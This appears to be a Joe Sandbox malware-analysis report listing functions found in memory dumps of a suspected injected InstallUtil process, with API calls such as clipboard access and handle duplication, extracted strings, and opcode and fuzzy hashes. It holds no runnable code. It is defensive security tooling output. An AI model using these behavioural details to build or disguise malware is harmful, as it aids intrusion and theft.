Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b831dadf358e5334c0de49c28c708c185e3a9701382367fb5f81d76bcea5b3a
Instruction ID: e0c2f55e6414f1a15200080606b254b855606c652e3b951bbb48b7b3c151dbc5
Opcode Fuzzy Hash: 4b831dadf358e5334c0de49c28c708c185e3a9701382367fb5f81d76bcea5b3a
Instruction Fuzzy Hash: 0D619E387441008FD758EF2AC955B2A77A3EBC8704F258069E6018B7B9CB79EC47DB80

Function 04CF5478 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff841de97f1cd0e14052d2e556746fa2b578ed0f6498a4c25dcf897a93099db
Instruction ID: ae354c06bfb1546622df7d9fe177372affa2b226076ac90d47c8c4b63e69caca
Opcode Fuzzy Hash: 6ff841de97f1cd0e14052d2e556746fa2b578ed0f6498a4c25dcf897a93099db
Instruction Fuzzy Hash: 1B617938A04104DFDB44CF6AD849BA977F3FB88315F258064E201AB7A6D779AD86DF40

Function 04CF5488 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db58c2f3c6016103fbef22fa2613567082a038e386bd9425fbe99be406a675b
Instruction ID: c64508d256775d0b6539a4af4360d7807aaaab8904fe4cb0b58f0d307b30cc41
Opcode Fuzzy Hash: 8db58c2f3c6016103fbef22fa2613567082a038e386bd9425fbe99be406a675b
Instruction Fuzzy Hash: 75516A38A04104DFDB84CF5AD849BA977B3FB88315F658064E301AB7A6C779AD85DF40

Function 04CE7C90 Relevance: 7.9, Strings: 6, Instructions: 405
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pbq, xrefs: 04CE7DE7
(bq, xrefs: 04CE7E5A
4'^q, xrefs: 04CE7D44
4'^q, xrefs: 04CE7D62
4'^q, xrefs: 04CE7DDA
4'^q, xrefs: 04CE7D14

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: 17dcc2e36186aeb99321058821d3edff755f1e01d79a1a7cb40ee99909552c9b
Instruction ID: d178c388ca4af7a2c20861e3f9ee53877bd11aec0f3e3df0c488a282b0409845
Opcode Fuzzy Hash: 17dcc2e36186aeb99321058821d3edff755f1e01d79a1a7cb40ee99909552c9b
Instruction Fuzzy Hash: 3DD15D36A40114DFCB09DFA5C944EA9BBB2FF88310F058498E5096B276D732ED56DB90

Function 05796058 Relevance: 7.7, APIs: 5, Instructions: 211
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 057960D6
GetCurrentThread.KERNEL32 ref: 05796113
GetCurrentProcess.KERNEL32 ref: 05796150
GetCurrentThreadId.KERNEL32 ref: 057961CE
DuplicateHandle.KERNELBASE(00000000,00000000,0572797C,?,00000000,050D9C4C,00000000,?,?,?,?), ref: 057962EF

Memory Dump Source

Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread$DuplicateHandle
String ID:
API String ID: 4285418203-0
Opcode ID: 55be374e71ebcf16f2fd1b99dd439eeba1f96c5e5ff1f944a7e08fb3c97b9484
Instruction ID: c31c4f28e5d2ec9a0dddff7056d910bb6726193cf2f414a35f9315d9a6de9068
Opcode Fuzzy Hash: 55be374e71ebcf16f2fd1b99dd439eeba1f96c5e5ff1f944a7e08fb3c97b9484
Instruction Fuzzy Hash: CF9132B0D012099FCB14CFAAD988B9EFBF5FB48314F10852AE419A7361DB34A844CF65

Function 05796048 Relevance: 6.1, APIs: 4, Instructions: 144
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 057960D6
GetCurrentThread.KERNEL32 ref: 05796113
GetCurrentProcess.KERNEL32 ref: 05796150
GetCurrentThreadId.KERNEL32 ref: 057961CE

Memory Dump Source

Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ad0363b0391727992006e8da552b3023d66ed533ce15e420e580858a1b5ede5f
Instruction ID: a58c40f85ada5d44b7184a4d01aa96f17a39e0ca10647a62ef6bd18a1171faf6
Opcode Fuzzy Hash: ad0363b0391727992006e8da552b3023d66ed533ce15e420e580858a1b5ede5f
Instruction Fuzzy Hash: 495135B0D016098FCB18CFAAD988B9EFBF1BF49304F10C52AE419A7261DB349844CF65

Function 04CF3F68 Relevance: 5.3, Strings: 4, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 04CF4017
Hbq, xrefs: 04CF4043
(bq, xrefs: 04CF414B
(bq, xrefs: 04CF4250

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$(bq$(bq$Hbq
API String ID: 0-2483291755
Opcode ID: a63069ce287411bea7d2df02728e9ba49a7fd71fc35e5f0b8c59ee6554609d24
Instruction ID: cf9d61ab8ff061f91f059183b997c9fce8a13fa5a9d78a90835a3935f7303800
Opcode Fuzzy Hash: a63069ce287411bea7d2df02728e9ba49a7fd71fc35e5f0b8c59ee6554609d24
Instruction Fuzzy Hash: 919169313042548FE71AAB39985062E7BB3EFD5310B1585BAD605CF392DE34ED06C799

Function 04CEB72F Relevance: 5.2, Strings: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(_^q, xrefs: 04CEBE71
(_^q, xrefs: 04CEBE3B
(_^q, xrefs: 04CEBDEB
(_^q, xrefs: 04CEBDF5

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$(_^q$(_^q
API String ID: 0-2697572114
Opcode ID: 5dc43116fe41952072adfa84667ecf6566c20a6d665560d274b8665cdc522251
Instruction ID: e0e8a3bffb9bf4e580c98a215262feda44403bc68d64544f1a41eb579911e574
Opcode Fuzzy Hash: 5dc43116fe41952072adfa84667ecf6566c20a6d665560d274b8665cdc522251
Instruction Fuzzy Hash: 6561CF75B042048FD708DF79C09557DBBB2EF89304F248469E50AAB361EB35ED86CB90

Function 04CF4310 Relevance: 4.3, Strings: 3, Instructions: 505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 04CF48B0
(bq, xrefs: 04CF4415
(bq, xrefs: 04CF46D8

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$(bq$(bq
API String ID: 0-2716923250
Opcode ID: 8e2d47d88c85ea60b7bcf5a8ac59518a25889c8ef016be5acc5e6adf8ff673c0
Instruction ID: e2b178acf56d6610bfae8516e9f415aa50fd502344e8a19d2a0497d1785a44d4
Opcode Fuzzy Hash: 8e2d47d88c85ea60b7bcf5a8ac59518a25889c8ef016be5acc5e6adf8ff673c0
Instruction Fuzzy Hash: 7F02AB35B006048FDB58DF68C994A6EBBF2FF88310B148569D54ADB781DA34FE02CB95

Function 04CE69D8 Relevance: 4.2, Strings: 3, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 04CE6F2C
Hbq, xrefs: 04CE6EAD
Hbq, xrefs: 04CE6EDC

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: 31ea28184bb5f0ef89fd6e3a59c1c69cedea875bee269dbf60dfbb483ca94d63
Instruction ID: f6ad1b4b286e4c17a88be553b24cfd5e677e80dce987d596ec9de738a2a2799d
Opcode Fuzzy Hash: 31ea28184bb5f0ef89fd6e3a59c1c69cedea875bee269dbf60dfbb483ca94d63
Instruction Fuzzy Hash: B0124A31B006049FDB25DFAAC884A6EB7B2FF88304F548569E50A9B391DB35FD46CB50

Function 04CE8688 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 04CE88A2
4'^q, xrefs: 04CE8A01
4'^q, xrefs: 04CE8981

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 0354be63da371fbf560d199ba64cda2d1fb9201de9b00c58e2707c7d679ef314
Instruction ID: 45a4c7ff5727b55c23c08a1f0f11d73b63330f927d92bf870e7a93f994e22e57
Opcode Fuzzy Hash: 0354be63da371fbf560d199ba64cda2d1fb9201de9b00c58e2707c7d679ef314
Instruction Fuzzy Hash: 2DF1EB34A10218CFDB08EFA5D994AADB7B2FF88305F118559E805AB3A5DB75FC42CB50

Function 04BB0B28 Relevance: 3.9, Strings: 2, Instructions: 1383COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04BB1CDE
4'^q, xrefs: 04BB1CEA

Memory Dump Source

Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: ab8ada1baf85975719d73b6e0244d72c76cb0819e3248be264148d9ae22f27ee
Instruction ID: e221801b88318e4c5610e46fdbbc5be10f604b4c32053f265dd5f27fd452e56b
Opcode Fuzzy Hash: ab8ada1baf85975719d73b6e0244d72c76cb0819e3248be264148d9ae22f27ee
Instruction Fuzzy Hash: BFA2D931F012158FAB352A7D582427F75D6DBC8780B1544EACA8AE7358EEB0FC4587E2

Function 050DA4EF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 050DA583

Strings

4'^q, xrefs: 050DA53C

Memory Dump Source

Source File: 00000008.00000002.2078547065.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_50d0000_InstallUtil.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'^q
API String ID: 2492992576-1614139903
Opcode ID: 021bb832a53df5c4da3a5402c4669fc75addabfd6180756a2f718036fe8b8bc3
Instruction ID: 46cb51126db0d4f4b1744ad98a05f289156a7f2e33247e0b5884ef3a55eb86f2
Opcode Fuzzy Hash: 021bb832a53df5c4da3a5402c4669fc75addabfd6180756a2f718036fe8b8bc3
Instruction Fuzzy Hash: A8218970A043498FCB00DFA9E4456EEFBF4FB08324F10855AE456A7291D7386945CFA5

Function 050DA500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 050DA583

Strings

4'^q, xrefs: 050DA53C

Memory Dump Source

Source File: 00000008.00000002.2078547065.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_50d0000_InstallUtil.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'^q
API String ID: 2492992576-1614139903
Opcode ID: 9cf43c4b8fb673aba601f08be9f3ff715296c78ad9826fb820a2f4827c71e240
Instruction ID: 253f6d07bb310f8e58907d7612bd698c49c7f970f712a40ea8c637cf929307cf
Opcode Fuzzy Hash: 9cf43c4b8fb673aba601f08be9f3ff715296c78ad9826fb820a2f4827c71e240
Instruction Fuzzy Hash: 332134B09043198FCB04DFAAD5456EEBBF4AB08324F10851AE459B7290CB38A944CFA5

Function 04CE6090 Relevance: 2.8, Strings: 2, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 04CE62F1
(bq, xrefs: 04CE60A4

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: c732e97ed204f46d84050c34b97f4ecec7859fab959b4632414abc02c86ad8b0
Instruction ID: 09c3c2f5dc09072b76149a4b64a3123da6fc5a5e08dfd270417c8d97ac0ccafb
Opcode Fuzzy Hash: c732e97ed204f46d84050c34b97f4ecec7859fab959b4632414abc02c86ad8b0
Instruction Fuzzy Hash: 3BD158357106028FCB14CF2AC58097AB7F3FF88314B598969E85A9B365DB31F946CB90

Function 04CEE4A0 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04CEE752
4'^q, xrefs: 04CEE780

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: b30bd38fc2083d7b563e4eb4b87cdc72aedfbc836447a3aba56a42525db7f72f
Instruction ID: 7d843f097badad55bb29bba91c3edebfe7fa21fc842b934440cdac2364e6fb87
Opcode Fuzzy Hash: b30bd38fc2083d7b563e4eb4b87cdc72aedfbc836447a3aba56a42525db7f72f
Instruction Fuzzy Hash: 7BC1CA74A00618DFDB04EFA5C994AADB7B2FF89304F104169E506AB3A5DB31FD42CB50

Function 04CEE490 Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04CEE752
4'^q, xrefs: 04CEE780

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 569b3951dc8e071c77547778c363221e141f10d3a825bbeaccc8cd127d11b5c3
Instruction ID: 407d6bbfa674de21387cf8d5b1a2cf510b5ab817bbe2d4f351bd56f35cabf82e
Opcode Fuzzy Hash: 569b3951dc8e071c77547778c363221e141f10d3a825bbeaccc8cd127d11b5c3
Instruction Fuzzy Hash: 4AB1C874A10618DFDB08EFA5C994AADB7B2FF89304F104168E506AB3A5DB71FD42CB50

Function 04CE1910 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

Hbq, xrefs: 04CE1AA5
(bq, xrefs: 04CE1A16

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: e076beb0f8abf51019bc9f5505cb8a7a0a3458c6fb6424a8140416d9fe77710a
Instruction ID: 95ae12feb3291bea285fea8bcbac3dd33bd63b42f5050ddebd86b375392fe544
Opcode Fuzzy Hash: e076beb0f8abf51019bc9f5505cb8a7a0a3458c6fb6424a8140416d9fe77710a
Instruction Fuzzy Hash: 0451A9357002048FD718AF7AC45062EB7B3EFC9351B2885A9D50A9B3A1EF35ED02CB91

Function 04CEDDE0 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

(bq, xrefs: 04CEDE47
,bq, xrefs: 04CEDDF0

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$,bq
API String ID: 0-1616511919
Opcode ID: c52c174351f3fd6e5cacdda12ae1825ec16ff81a45a1e5068d25a54105a5a0d6
Instruction ID: 7e11cc86dbccc7e9c5525781b96f543b18e93ed4e7a6d2afdeeff324b76419ec
Opcode Fuzzy Hash: c52c174351f3fd6e5cacdda12ae1825ec16ff81a45a1e5068d25a54105a5a0d6
Instruction Fuzzy Hash: AB41C4337000696FDF119EAA9C509FFBBEAEB88211B044067FA15E7241DA35DD159BA0

Function 04CF6980 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

(bq, xrefs: 04CF69C4
(bq, xrefs: 04CF6A4F

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 247011b9db0f9b00e72e0a23afb8d619cf2066beaedb352181a8a38eca50786a
Instruction ID: e9a06b4b967247095196a1cb9421d1da686553c167a39239ac2326f8c17de942
Opcode Fuzzy Hash: 247011b9db0f9b00e72e0a23afb8d619cf2066beaedb352181a8a38eca50786a
Instruction Fuzzy Hash: D0410231F042558FCB05DFB998505DEBFB2EFC6311F14816AC415EB396EA348E068B91

Function 04D1F2B0 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

(bq, xrefs: 04D1F3D8
Hbq, xrefs: 04D1F404

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: c3ff25de63469dfee3a84648f5a277f998af4c61ba86d5172206a47caa8b0ab3
Instruction ID: 757e3db742ed6c3b26f094d1573bdf18f57a9506cf5a72e5e3c5c4b002e206ab
Opcode Fuzzy Hash: c3ff25de63469dfee3a84648f5a277f998af4c61ba86d5172206a47caa8b0ab3
Instruction Fuzzy Hash: 9341D1712047409FE724DF3AD44031ABBE2EFC0310F148A6DD89A8B7A5EB74F9498B51

Function 04CFA180 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

`Q^q, xrefs: 04CFA213
PH^q, xrefs: 04CFA3B9

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID: PH^q$`Q^q
API String ID: 0-3163867966
Opcode ID: 9740ff3e7c828720624c05ce0b15378d9f2a7350d2f9a80ea46695d5cd0b8cb3
Instruction ID: e03c0c2211533187747b5747be4b0cb29706d19b4490995158f579e4a17a3858
Opcode Fuzzy Hash: 9740ff3e7c828720624c05ce0b15378d9f2a7350d2f9a80ea46695d5cd0b8cb3
Instruction Fuzzy Hash: E7516E74F85215DFDB548F25DC9876DB7B2FB84301F1480AAD60EA7390DA3A9E848F41

Function 04CE7C80 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

pbq, xrefs: 04CE7DE7
4'^q, xrefs: 04CE7D14

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$pbq
API String ID: 0-3872760177
Opcode ID: 8c2dbab9e99f1f5a2b4e350daac9ede4e88ad6b4e6fabdbfbec07f0df5b5584a
Instruction ID: 69d01c56a9897e54159dd20a01c76b037818e9800e004985ad219d08d8051cf3
Opcode Fuzzy Hash: 8c2dbab9e99f1f5a2b4e350daac9ede4e88ad6b4e6fabdbfbec07f0df5b5584a
Instruction Fuzzy Hash: 3B41A471A402059FC704DF69C9407AEBBF7EFC4304F148928D5099B359EB75EE4A8B91

Function 04BB8370 Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04BB8434
4'^q, xrefs: 04BB8428

Memory Dump Source

Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 30ce70b6f8ddc0b520be61de7f17927244b1c7fdc7349b8f4459aa11f174a5d0
Instruction ID: ca981a51afcc587b71257d0dc1209ef115f341490df55e116ea345448127103b
Opcode Fuzzy Hash: 30ce70b6f8ddc0b520be61de7f17927244b1c7fdc7349b8f4459aa11f174a5d0
Instruction Fuzzy Hash: 1711C1347806028B5B1D3A3A54241BE61DBDFC676632850B9E587CB3E4EEB9EC0243D2

Function 04CE2F20 Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

(_^q, xrefs: 04CE31B0

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: 9de3a5204cb1348b8b3742640ac3255314b91afc961b1f92001246a4869472a5
Instruction ID: d3a67b61fbb20709b0cd38012f3f10db85387d329df463c2e42b9b84744fa089
Opcode Fuzzy Hash: 9de3a5204cb1348b8b3742640ac3255314b91afc961b1f92001246a4869472a5
Instruction Fuzzy Hash: 87227B35B002449FDB08DFAAC494A6DBBF2EF88310F148469E905AB3A2DB35FD45CB50

Function 057964C4 Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 05796558

Memory Dump Source

Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: cd369ecdcac03e76dec7e24167da846b31623f659c2d477cb7630d3d1796fa03
Instruction ID: 69b863aae8a25fa56470363ca86c177fb2e5e2a58520b406ba934a0f1c061e21
Opcode Fuzzy Hash: cd369ecdcac03e76dec7e24167da846b31623f659c2d477cb7630d3d1796fa03
Instruction Fuzzy Hash: 703132B0D00208EFDF14CFA9D984BDDBBF1AF08314F248029E409AB294DBB4A945CF65

Function 057964D0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 05796558

Memory Dump Source

Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 6cabfdccb078a0ad63e2aa15a53d5da5440596bbd6b85dd294556e889313e98c
Instruction ID: aee3fea82e9e649b2977b1e228683471c25baaecf047022c55e7b09a92ffb38a
Opcode Fuzzy Hash: 6cabfdccb078a0ad63e2aa15a53d5da5440596bbd6b85dd294556e889313e98c
Instruction Fuzzy Hash: 7B3122B0D01208DFDB14CFA9D984BCEBBF5AF48304F248029E405BB294DB74A985CF65

Function 050DA400 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 050DA48F

Memory Dump Source

Source File: 00000008.00000002.2078547065.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_50d0000_InstallUtil.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: efbe569a0507ba2b6ea3afcd8e612f4cc0e51fbdc798c2a47e2d1742d9055ced
Instruction ID: 7f7422ddec64c22e901b4dfd2bae71e3e94f2870c65cc07b940363482f8c4be2
Opcode Fuzzy Hash: efbe569a0507ba2b6ea3afcd8e612f4cc0e51fbdc798c2a47e2d1742d9055ced
Instruction Fuzzy Hash: FF219AB0A043589FCB10DF99D449BAEBFF0EB89324F10841AE855AB281C7349944CFA5

Function 05796260 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(00000000,00000000,0572797C,?,00000000,050D9C4C,00000000,?,?,?,?), ref: 057962EF

Memory Dump Source

Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e9d8ba12b21a17202de807f9c6d7b863e70cc37825455de1c7c83b8457002631
Instruction ID: 883407bc1fd31b56b0c5a5e3d234e2ce1c1ce228a32c508b22629b8c69409270
Opcode Fuzzy Hash: e9d8ba12b21a17202de807f9c6d7b863e70cc37825455de1c7c83b8457002631
Instruction Fuzzy Hash: 1121E5B59002589FDB10CF99D584ADEFBF5FB48320F14842AE954A3350D374A944DFA5

Function 05795E74 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(00000000,00000000,0572797C,?,00000000,050D9C4C,00000000,?,?,?,?), ref: 057962EF

Memory Dump Source

Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4e3daf1672b44888d756818ff23a9a1a9df242207db7bb2bde581450f9f78091
Instruction ID: 4add2f0ea42596ea66d2e8298e8f5765d05d326a3227e6b28e36bf50490587e4
Opcode Fuzzy Hash: 4e3daf1672b44888d756818ff23a9a1a9df242207db7bb2bde581450f9f78091
Instruction Fuzzy Hash: 6721E4B59002589FDB10CF9AD584ADEFBF4FB48320F14842AE958A7310D378A944CFA5

Function 050DA410 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 050DA48F

Memory Dump Source

Source File: 00000008.00000002.2078547065.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_50d0000_InstallUtil.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: 9ac15c6c7567a3bb7388ba3168781b75356d272b10f92fab18990ea0c61e3f8d
Instruction ID: 532ed81b41b1c575a798c77adabe7da146e07642be09bcdef49e4d4ea241d182
Opcode Fuzzy Hash: 9ac15c6c7567a3bb7388ba3168781b75356d272b10f92fab18990ea0c61e3f8d
